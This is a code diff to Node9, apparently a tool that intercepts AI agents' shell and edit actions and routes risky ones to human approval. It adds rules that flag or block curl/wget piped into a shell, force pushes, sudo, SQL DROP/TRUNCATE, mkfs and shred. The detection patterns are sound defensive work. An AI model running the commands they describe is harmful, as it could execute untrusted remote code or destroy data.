'drop', - 'truncate', - 'purge', - 'format', - 'destroy', - 'terminate', - 'revoke', - 'docker', - 'psql', + 'mkfs', // formats/wipes a filesystem partition + 'shred', // permanently overwrites file contents (unrecoverable) ]; // 2. The Master Default Config @@ -526,6 +524,8 @@ export const DEFAULT_CONFIG: Config = { ignorePaths: ['**/node_modules/**', 'dist/**', 'build/**', '.next/**', '**/*.log'], }, rules: [ + // Only use the legacy rules format for simple path-based rm control. + // All other command-level enforcement lives in smartRules below. { action: 'rm', allowPaths: [ @@ -542,6 +542,7 @@ export const DEFAULT_CONFIG: Config = { }, ], smartRules: [ + // ── SQL safety ──────────────────────────────────────────────────────── { name: 'no-delete-without-where', tool: '*', @@ -553,6 +554,84 @@ export const DEFAULT_CONFIG: Config = { verdict: 'review', reason: 'DELETE/UPDATE without WHERE clause — would affect every row in the table', }, + { + name: 'review-drop-truncate-shell', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: '\\b(DROP|TRUNCATE)\\s+(TABLE|DATABASE|SCHEMA|INDEX)', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'review', + reason: 'SQL DDL destructive statement inside a shell command', + }, + // ── Git safety ──────────────────────────────────────────────────────── + { + name: 'block-force-push', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: 'git push.*(--force|--force-with-lease|-f\\b)', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'block', + reason: 'Force push overwrites remote history and cannot be undone', + }, + { + name: 'review-git-push', + tool: 'bash', + conditions: [{ field: 'command', op: 'matches', value: '^\\s*git push\\b', flags: 'i' }], + conditionMode: 'all', + verdict: 'review', + reason: 'git push sends changes to a shared remote', + }, + { + name: 'review-git-destructive', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: 'git\\s+(reset\\s+--hard|clean\\s+-[fdxX]|rebase|tag\\s+-d|branch\\s+-[dD])', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'review', + reason: 'Destructive git operation — discards history or working-tree changes', + }, + // ── Shell safety ────────────────────────────────────────────────────── + { + name: 'review-sudo', + tool: 'bash', + conditions: [{ field: 'command', op: 'matches', value: '^\\s*sudo\\s', flags: 'i' }], + conditionMode: 'all', + verdict: 'review', + reason: 'Command requires elevated privileges', + }, + { + name: 'review-curl-pipe-shell', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: '(curl|wget)[^|]*\\|\\s*(ba|z|da|fi|c|k)?sh', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'block', + reason: 'Piping remote script into a shell is a supply-chain attack vector', + }, ], }, environments: {}, @@ -639,6 +718,8 @@ export async function evaluatePolicy( reason?: string; matchedField?: string; matchedWord?: string; + tier?: 1 | 2 | 3 | 4 | 5 | 6 | 7; + ruleName?: string; }> { const config = getConfig(); @@ -656,6 +737,8 @@ export async function evaluatePolicy( decision: matchedRule.verdict, blockedByLabel: `Smart Rule: ${matchedRule.name ?? matchedRule.tool}`, reason: matchedRule.reason, + tier: 2, + ruleName: matchedRule.name ?? matchedRule.tool, }; } } @@ -675,7 +758,7 @@ export async function evaluatePolicy( // Inline arbitrary code execution is always a review const INLINE_EXEC_PATTERN = /^(python3?|bash|sh|zsh|perl|ruby|node|php|lua)\s+(-c|-e|-eval)\s/i; if (INLINE_EXEC_PATTERN.test(shellCommand.trim())) { - return { decision: 'review', blockedByLabel: 'Node9 Standard (Inline Execution)' }; + return { decision: 'review', blockedByLabel: 'Node9 Standard (Inline Execution)', tier: 3 }; } // Strip DML keywords from tokens so user dangerousWords like "delete"/"update" @@ -714,7 +797,7 @@ export async function evaluatePolicy( if (hasSystemDisaster || isRootWipe) { // If it IS a system disaster, return review so the dev gets a // "Manual Nuclear Protection" popup as a final safety check. - return { decision: 'review', blockedByLabel: 'Manual Nuclear Protection' }; + return { decision: 'review', blockedByLabel: 'Manual Nuclear Protection', tier: 3 }; } // For everything else (docker, psql, rmdir, delete, rm), @@ -740,6 +823,7 @@ export async function evaluatePolicy( return { decision: 'review', blockedByLabel: `Project/Global Config — rule "${rule.action}" (path blocked)`, + tier: 5, }; const allAllowed = pathTokens.every((p) => matchesPattern(p, rule.allowPaths || [])); if (allAllowed) return { decision: 'allow' }; @@ -747,6 +831,7 @@ export async function evaluatePolicy( return { decision: 'review', blockedByLabel: `Project/Global Config — rule "${rule.action}" (default block)`, + tier: 5, }; } } @@ -798,6 +883,7 @@ export async function evaluatePolicy( blockedByLabel: `Project/Global Config — dangerous word: "${matchedDangerousWord}"`, matchedWord: matchedDangerousWord, matchedField, + tier: 6, }; } @@ -805,7 +891,7 @@ export async function evaluatePolicy( if (config.settings.mode === 'strict') { const envConfig = getActiveEnvironment(config); if (envConfig?.requireApproval === false) return { decision: 'allow' }; - return { decision: 'review', blockedByLabel: 'Global Config (Strict Mode Active)' }; + return { decision: 'review', blockedByLabel: 'Global Config (Strict Mode Active)', tier: 7 }; } return { decision: 'allow' }; @@ -1215,7 +1301,8 @@ async function askDaemon( toolName: string, args: unknown, meta?: { agent?: string; mcpServer?: string }, - signal?: AbortSignal // NEW: Added signal + signal?: AbortSignal, + riskMetadata?: RiskMetadata ): Promise<'allow' | 'deny' | 'abandoned'> { const base = `http://${DAEMON_HOST}:${DAEMON_PORT}`; @@ -1229,7 +1316,13 @@ async function askDaemon( const checkRes = await fetch(`${base}/check`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, - body: JSON.stringify({ toolName, args, agent: meta?.agent, mcpServer: meta?.mcpServer }), + body: JSON.stringify({ + toolName, + args, + agent: meta?.agent, + mcpServer: meta?.mcpServer, + ...(riskMetadata && { riskMetadata }), + }), signal: checkCtrl.signal, }); if (!checkRes.ok) throw new Error('Daemon fail'); @@ -1261,7 +1354,8 @@ async function askDaemon( async function notifyDaemonViewer( toolName: string, args: unknown, - meta?: { agent?: string; mcpServer?: string } + meta?: { agent?: string; mcpServer?: string }, + riskMetadata?: RiskMetadata ): Promise { const base = `http://${DAEMON_HOST}:${DAEMON_PORT}`; const res = await fetch(`${base}/check`, { @@ -1273,6 +1367,7 @@ async function notifyDaemonViewer( slackDelegated: true, agent: meta?.agent, mcpServer: meta?.mcpServer, + ...(riskMetadata && { riskMetadata }), }), signal: AbortSignal.timeout(3000), }); @@ -1381,12 +1476,18 @@ export async function authorizeHeadless( let explainableLabel = 'Local Config'; let policyMatchedField: string | undefined; let policyMatchedWord: string | undefined; + let riskMetadata: RiskMetadata | undefined; if (config.settings.mode === 'audit') { if (!isIgnoredTool(toolName)) { const policyResult = await evaluatePolicy(toolName, args, meta?.agent); if (policyResult.decision === 'review') { appendLocalAudit(toolName, args, 'allow', 'audit-mode', meta); + // Must await — process.exit(0) follows immediately and kills any fire-and-forget fetch. + // Only send to SaaS when cloud is enabled — respects privacy mode (cloud: false). + if (approvers.cloud && creds?.apiKey) { + await auditLocalAllow(toolName, args, 'audit-mode', creds, meta); + } sendDesktopNotification( 'Node9 Audit Mode', `Would have blocked "${toolName}" (${policyResult.blockedByLabel || 'Local Config'}) — running in audit mode` @@ -1399,13 +1500,15 @@ export async function authorizeHeadless( // Fast Paths (Ignore, Trust, Policy Allow) if (!isIgnoredTool(toolName)) { if (getActiveTrustSession(toolName)) { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'trust', creds, meta); + if (approvers.cloud && creds?.apiKey) + await auditLocalAllow(toolName, args, 'trust', creds, meta); if (!isManual) appendLocalAudit(toolName, args, 'allow', 'trust', meta); return { approved: true, checkedBy: 'trust' }; } const policyResult = await evaluatePolicy(toolName, args, meta?.agent); if (policyResult.decision === 'allow') { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'local-policy', creds, meta); + if (approvers.cloud && creds?.apiKey) + auditLocalAllow(toolName, args, 'local-policy', creds, meta); if (!isManual) appendLocalAudit(toolName, args, 'allow', 'local-policy', meta); return { approved: true, checkedBy: 'local-policy' }; } @@ -1424,10 +1527,19 @@ export async function authorizeHeadless( explainableLabel = policyResult.blockedByLabel || 'Local Config'; policyMatchedField = policyResult.matchedField; policyMatchedWord = policyResult.matchedWord; + riskMetadata = computeRiskMetadata( + args, + policyResult.tier ?? 6, + explainableLabel, + policyMatchedField, + policyMatchedWord, + policyResult.ruleName + ); const persistent = getPersistentDecision(toolName); if (persistent === 'allow') { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'persistent', creds, meta); + if (approvers.cloud && creds?.apiKey) + await auditLocalAllow(toolName, args, 'persistent', creds, meta); if (!isManual) appendLocalAudit(toolName, args, 'allow', 'persistent', meta); return { approved: true, checkedBy: 'persistent' }; } @@ -1441,7 +1553,8 @@ export async function authorizeHeadless( }; } } else { - if (creds?.apiKey) auditLocalAllow(toolName, args, 'ignoredTools', creds, meta); + // ignoredTools (read, glob, grep, ls…) fire on every agent operation — too + // frequent and too noisy to send to the SaaS audit log. if (!isManual) appendLocalAudit(toolName, args, 'allow', 'ignored', meta); return { approved: true }; } @@ -1453,9 +1566,21 @@ export async function authorizeHeadless( if (cloudEnforced) { try { - const initResult = await initNode9SaaS(toolName, args, creds!, meta); + const initResult = await initNode9SaaS(toolName, args, creds!, meta, riskMetadata); if (!initResult.pending) { + // Shadow mode: allowed through, but warn the developer passively + if (initResult.shadowMode) { + console.error( + chalk.yellow( + `\n⚠️ Node9 Shadow Mode: Action allowed, but would have been blocked by company policy.` + ) + ); + if (initResult.shadowReason) { + console.error(chalk.dim(` Reason: ${initResult.shadowReason}\n`)); + } + return { approved: true, checkedBy: 'cloud' }; + } return { approved: !!initResult.approved, reason: @@ -1495,18 +1620,23 @@ export async function authorizeHeadless( // Print before the race so the message is guaranteed to show regardless of // which channel wins (cloud message was previously lost when native popup // resolved first and aborted the race before pollNode9SaaS could print it). - if (cloudEnforced && cloudRequestId) { - console.error( - chalk.yellow('\n🛡️ Node9: Action suspended — waiting for Organization approval.') - ); - console.error(chalk.cyan(' Dashboard → ') + chalk.bold('Mission Control > Activity Feed\n')); - } else if (!cloudEnforced) { - const cloudOffReason = !creds?.apiKey - ? 'no API key — run `node9 login` to connect' - : 'privacy mode (cloud disabled)'; - console.error( - chalk.dim(`\n🛡️ Node9: intercepted "${toolName}" — cloud off (${cloudOffReason})\n`) - ); + // Skip when called from the daemon — the CLI already printed this message. + if (!options?.calledFromDaemon) { + if (cloudEnforced && cloudRequestId) { + console.error( + chalk.yellow('\n🛡️ Node9: Action suspended — waiting for Organization approval.') + ); + console.error( + chalk.cyan(' Dashboard → ') + chalk.bold('Mission Control > Activity Feed\n') + ); + } else if (!cloudEnforced) { + const cloudOffReason = !creds?.apiKey + ? 'no API key — run `node9 login` to connect' + : 'privacy mode (cloud disabled)'; + console.error( + chalk.dim(`\n🛡️ Node9: intercepted "${toolName}" — cloud off (${cloudOffReason})\n`) + ); + } } // ── THE MULTI-CHANNEL RACE ENGINE ────────────────────────────────────────── @@ -1544,7 +1674,9 @@ export async function authorizeHeadless( (async () => { try { if (isDaemonRunning() && internalToken && !options?.calledFromDaemon) { - viewerId = await notifyDaemonViewer(toolName, args, meta).catch(() => null); + viewerId = await notifyDaemonViewer(toolName, args, meta, riskMetadata).catch( + () => null + ); } const cloudResult = await pollNode9SaaS(cloudRequestId, creds!, signal); @@ -1567,7 +1699,10 @@ export async function authorizeHeadless( } // 🏁 RACER 2: Native OS Popup - if (approvers.native && !isManual) { + // Skip when called from the daemon's background pipeline — the CLI already + // launched this popup as part of its own race; firing it a second time from + // the daemon would show a duplicate popup for the same request. + if (approvers.native && !isManual && !options?.calledFromDaemon) { racePromises.push( (async () => { // Pass isRemoteLocked so the popup knows to hide the "Allow" button @@ -1602,7 +1737,10 @@ export async function authorizeHeadless( } // 🏁 RACER 3: Browser Dashboard - if (approvers.browser && isDaemonRunning() && !options?.calledFromDaemon) { + // Skip when cloudEnforced — notifyDaemonViewer already created a viewer card on + // the dashboard. Running askDaemon on top would create a second duplicate entry, + // open a second browser tab, and fire a second daemon authorizeHeadless call. + if (approvers.browser && isDaemonRunning() && !options?.calledFromDaemon && !cloudEnforced) { racePromises.push( (async () => { try { @@ -1613,7 +1751,7 @@ export async function authorizeHeadless( console.error(chalk.cyan(` URL → http://${DAEMON_HOST}:${DAEMON_PORT}/\n`)); } - const daemonDecision = await askDaemon(toolName, args, meta, signal); + const daemonDecision = await askDaemon(toolName, args, meta, signal, riskMetadata); if (daemonDecision === 'abandoned') throw new Error('Abandoned'); const isApproved = daemonDecision === 'allow'; @@ -1871,11 +2009,23 @@ export function getConfig(): Config { function tryLoadConfig(filePath: string): Record | null { if (!fs.existsSync(filePath)) return null; + let raw: unknown; try { - return JSON.parse(fs.readFileSync(filePath, 'utf-8')) as Record; - } catch { + raw = JSON.parse(fs.readFileSync(filePath, 'utf-8')); + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + process.stderr.write( + `\n⚠️ Node9: Failed to parse ${filePath}\n ${msg}\n → Using default config\n\n` + ); return null; } + const { sanitized, error } = sanitizeConfig(raw); + if (error) { + process.stderr.write( + `\n⚠️ Node9: Invalid config at ${filePath}:\n${error.replace('Invalid config:\n', '')}\n → Invalid fields ignored, using defaults for those keys\n\n` + ); + } + return sanitized; } function getActiveEnvironment(config: Config): EnvironmentConfig | null { @@ -1927,8 +2077,9 @@ export interface CloudApprovalResult { } /** - * Fire-and-forget: send an audit record to the backend for a locally fast-pathed call. - * Never blocks the agent — failures are silently ignored. + * Send an audit record to the SaaS backend for a locally fast-pathed call. + * Returns a Promise so callers that precede process.exit(0) can await it. + * Failures are silently ignored — never blocks the agent. */ function auditLocalAllow( toolName: string, @@ -1936,11 +2087,8 @@ function auditLocalAllow( checkedBy: string, creds: { apiKey: string; apiUrl: string }, meta?: { agent?: string; mcpServer?: string } -): void { - const controller = new AbortController(); - setTimeout(() => controller.abort(), 5000); - - fetch(`${creds.apiUrl}/audit`, { +): Promise { + return fetch(`${creds.apiUrl}/audit`, { method: 'POST', headers: { 'Content-Type': 'application/json', Authorization: `Bearer ${creds.apiKey}` }, body: JSON.stringify({ @@ -1955,8 +2103,10 @@ function auditLocalAllow( platform: os.platform(), }, }), - signal: controller.signal, - }).catch(() => {}); + signal: AbortSignal.timeout(5000), + }) + .then(() => {}) + .catch(() => {}); } /** @@ -1966,13 +2116,16 @@ async function initNode9SaaS( toolName: string, args: unknown, creds: { apiKey: string; apiUrl: string }, - meta?: { agent?: string; mcpServer?: string } + meta?: { agent?: string; mcpServer?: string }, + riskMetadata?: RiskMetadata ): Promise<{ pending: boolean; requestId?: string; approved?: boolean; reason?: string; remoteApprovalOnly?: boolean; + shadowMode?: boolean; + shadowReason?: string; }> { const controller = new AbortController(); const timeout = setTimeout(() => controller.abort(), 10000); @@ -1991,6 +2144,7 @@ async function initNode9SaaS( cwd: process.cwd(), platform: os.platform(), }, + ...(riskMetadata && { riskMetadata }), }), signal: controller.signal, }); @@ -2004,6 +2158,8 @@ async function initNode9SaaS( approved?: boolean; reason?: string; remoteApprovalOnly?: boolean; + shadowMode?: boolean; + shadowReason?: string; }; } finally { clearTimeout(timeout); diff --git a/src/daemon/index.ts b/src/daemon/index.ts index 819ba80..3f30d8f 100644 --- a/src/daemon/index.ts +++ b/src/daemon/index.ts @@ -1,5 +1,6 @@ // src/daemon/index.ts — Node9 localhost approval server import { UI_HTML_TEMPLATE } from './ui'; +import { RiskMetadata } from '../context-sniper'; import http from 'http'; import fs from 'fs'; import path from 'path'; @@ -7,7 +8,7 @@ import os from 'os'; import { spawn } from 'child_process'; import { randomUUID } from 'crypto'; import chalk from 'chalk'; -import { authorizeHeadless, getGlobalSettings, getConfig } from '../core'; +import { authorizeHeadless, getGlobalSettings, getConfig, _resetConfigCache } from '../core'; export const DAEMON_PORT = 7391; export const DAEMON_HOST = '127.0.0.1'; @@ -136,6 +137,7 @@ interface PendingEntry { id: string; toolName: string; args: unknown; + riskMetadata?: RiskMetadata; agent?: string; mcpServer?: string; timestamp: number; @@ -274,6 +276,7 @@ export function startDaemon(): void { id: e.id, toolName: e.toolName, args: e.args, + riskMetadata: e.riskMetadata, slackDelegated: e.slackDelegated, timestamp: e.timestamp, agent: e.agent, @@ -300,15 +303,24 @@ export function startDaemon(): void { if (req.method === 'POST' && pathname === '/check') { try { resetIdleTimer(); // Agent is active, reset the shutdown clock + _resetConfigCache(); // Always read fresh config — catches login/manual edits without restart const body = await readBody(req); if (body.length > 65_536) return res.writeHead(413).end(); - const { toolName, args, slackDelegated = false, agent, mcpServer } = JSON.parse(body); + const { + toolName, + args, + slackDelegated = false, + agent, + mcpServer, + riskMetadata, + } = JSON.parse(body); const id = randomUUID(); const entry: PendingEntry = { id, toolName, args, + riskMetadata: riskMetadata ?? undefined, agent: typeof agent === 'string' ? agent : undefined, mcpServer: typeof mcpServer === 'string' ? mcpServer : undefined, slackDelegated: !!slackDelegated, @@ -340,6 +352,7 @@ export function startDaemon(): void { id, toolName, args, + riskMetadata: entry.riskMetadata, slackDelegated: entry.slackDelegated, agent: entry.agent, mcpServer: entry.mcpServer, diff --git a/src/daemon/ui.html b/src/daemon/ui.html index 692b854..9dfd27e 100644 --- a/src/daemon/ui.html +++ b/src/daemon/ui.html @@ -225,6 +225,55 @@ white-space: pre-wrap; word-break: break-all; } + /* ── Context Sniper ─────────────────────────────────────────── */ + .sniper-header { + display: flex; + align-items: center; + gap: 8px; + flex-wrap: wrap; + margin-bottom: 8px; + } + .sniper-badge { + font-size: 11px; + font-weight: 600; + padding: 3px 8px; + border-radius: 5px; + letter-spacing: 0.02em; + } + .sniper-badge-edit { + background: rgba(59, 130, 246, 0.15); + color: #60a5fa; + border: 1px solid rgba(59, 130, 246, 0.3); + } + .sniper-badge-exec { + background: rgba(239, 68, 68, 0.12); + color: #f87171; + border: 1px solid rgba(239, 68, 68, 0.25); + } + .sniper-tier { + font-size: 10px; + color: var(--muted); + font-family: 'Fira Code', monospace; + } + .sniper-filepath { + font-size: 11px; + color: #a8b3c4; + font-family: 'Fira Code', monospace; + margin-bottom: 6px; + word-break: break-all; + } + .sniper-match { + font-size: 11px; + color: #a8b3c4; + margin-bottom: 6px; + } + .sniper-match code { + background: rgba(239, 68, 68, 0.15); + color: #f87171; + padding: 1px 5px; + border-radius: 3px; + font-family: 'Fira Code', monospace; + } .actions { display: grid; grid-template-columns: 1fr 1fr; @@ -731,20 +780,47 @@

✅ Slack key saved

}, 200); } + function renderPayload(req) { + const rm = req.riskMetadata; + if (!rm) { + // Fallback: raw args for requests without context sniper data + const cmd = esc( + String( + req.args && + (req.args.command || + req.args.cmd || + req.args.script || + JSON.stringify(req.args, null, 2)) + ) + ); + return `Input Payload
${cmd}
`; + } + const isEdit = rm.intent === 'EDIT'; + const badgeClass = isEdit ? 'sniper-badge-edit' : 'sniper-badge-exec'; + const badgeLabel = isEdit ? '📝 Code Edit' : '🛑 Execution'; + const tierLabel = `Tier ${rm.tier} · ${esc(rm.blockedByLabel)}`; + const fileLine = + isEdit && rm.editFilePath + ? `
📂 ${esc(rm.editFilePath)}
` + : !isEdit && rm.matchedWord + ? `
Matched: ${esc(rm.matchedWord)}${rm.matchedField ? ` in ${esc(rm.matchedField)}` : ''}
` + : ''; + const snippetHtml = rm.contextSnippet ? `
${esc(rm.contextSnippet)}
` : ''; + return ` +
+ ${badgeLabel} + ${tierLabel} +
+ ${fileLine} + ${snippetHtml} + `; + } + function addCard(req) { if (requests.has(req.id)) return; requests.add(req.id); refresh(); const isSlack = !!req.slackDelegated; - const cmd = esc( - String( - req.args && - (req.args.command || - req.args.cmd || - req.args.script || - JSON.stringify(req.args, null, 2)) - ) - ); const card = document.createElement('div'); card.className = 'card' + (isSlack ? ' slack-viewer' : ''); card.id = 'c-' + req.id; @@ -758,8 +834,7 @@

✅ Slack key saved

${esc(req.toolName)}
${isSlack ? '
⚡ Awaiting Slack approval — view only
' : ''} - Input Payload -
${cmd}
+ ${renderPayload(req)}
diff --git a/src/ui/native.ts b/src/ui/native.ts index 3be2a72..90e828e 100644 --- a/src/ui/native.ts +++ b/src/ui/native.ts @@ -2,6 +2,7 @@ import { spawn, ChildProcess } from 'child_process'; import path from 'path'; import chalk from 'chalk'; +import { smartTruncate, extractContext } from '../context-sniper'; const isTestEnv = () => { return ( @@ -14,50 +15,6 @@ const isTestEnv = () => { ); }; -/** - * Truncates long strings by keeping the start and end. - */ -function smartTruncate(str: string, maxLen: number = 500): string { - if (str.length <= maxLen) return str; - const edge = Math.floor(maxLen / 2) - 3; - return `${str.slice(0, edge)} ... ${str.slice(-edge)}`; -} - -/** - * Shows 3 lines of context around the dangerous word. - * Prefers non-comment lines when the word appears in multiple places. - */ -function extractContext(text: string, matchedWord?: string): string { - const lines = text.split('\n'); - if (lines.length <= 7 || !matchedWord) return smartTruncate(text, 500); - - const escaped = matchedWord.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); - const pattern = new RegExp(`\\b${escaped}\\b`, 'i'); - - const allHits = lines.map((line, i) => ({ i, line })).filter(({ line }) => pattern.test(line)); - if (allHits.length === 0) return smartTruncate(text, 500); - - // Prefer lines that aren't pure comments - const nonComment = allHits.find(({ line }) => { - const trimmed = line.trim(); - return !trimmed.startsWith('//') && !trimmed.startsWith('#'); - }); - const hitIndex = (nonComment ?? allHits[0]).i; - - const start = Math.max(0, hitIndex - 3); - const end = Math.min(lines.length, hitIndex + 4); - - const snippet = lines - .slice(start, end) - .map((line, i) => `${start + i === hitIndex ? '🛑 ' : ' '}${line}`) - .join('\n'); - - const head = start > 0 ? `... [${start} lines hidden] ...\n` : ''; - const tail = end < lines.length ? `\n... [${lines.length - end} lines hidden] ...` : ''; - - return `${head}${snippet}${tail}`; -} - function formatArgs( args: unknown, matchedField?: string, @@ -88,7 +45,7 @@ function formatArgs( if (obj.old_string !== undefined && obj.new_string !== undefined) { const file = obj.file_path ? path.basename(String(obj.file_path)) : 'file'; const oldPreview = smartTruncate(String(obj.old_string), 120); - const newPreview = extractContext(String(obj.new_string), matchedWord); + const newPreview = extractContext(String(obj.new_string), matchedWord).snippet; return { intent: 'EDIT', message: @@ -105,7 +62,7 @@ function formatArgs( otherKeys.length > 0 ? `⚙️ Context: ${otherKeys.map((k) => `${k}=${smartTruncate(typeof obj[k] === 'object' ? JSON.stringify(obj[k]) : String(obj[k]), 30)}`).join(', ')}\n\n` : ''; - const content = extractContext(String(obj[matchedField]), matchedWord); + const content = extractContext(String(obj[matchedField]), matchedWord).snippet; return { intent: 'EXEC', message: `${context}🛑 [${matchedField.toUpperCase()}]:\n${content}`,